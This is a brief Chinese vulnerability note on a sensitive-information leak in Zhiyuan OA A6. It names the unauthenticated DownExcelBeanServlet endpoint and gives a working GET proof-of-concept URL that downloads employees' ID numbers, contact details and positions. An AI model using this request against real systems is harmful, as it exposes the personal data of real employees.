007-致远OA A6 敏感信息泄露(二)

# 致远OA A6 敏感信息泄露(二)

### 一、漏洞简介

### 二、漏洞影响

致远OA A6

### 三、复现过程

漏洞位置:

“`
http://url/yyoa/DownExcelBeanServlet
“`

漏洞详情:

版本:A6只有系统管理才有的权限,但是任意用户都可以访问。可以下载所有员工的个人信息,包括身份证、联系方式、职位等敏感信息。

请求方式:

Get

Poc:

“`bash
http://url/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容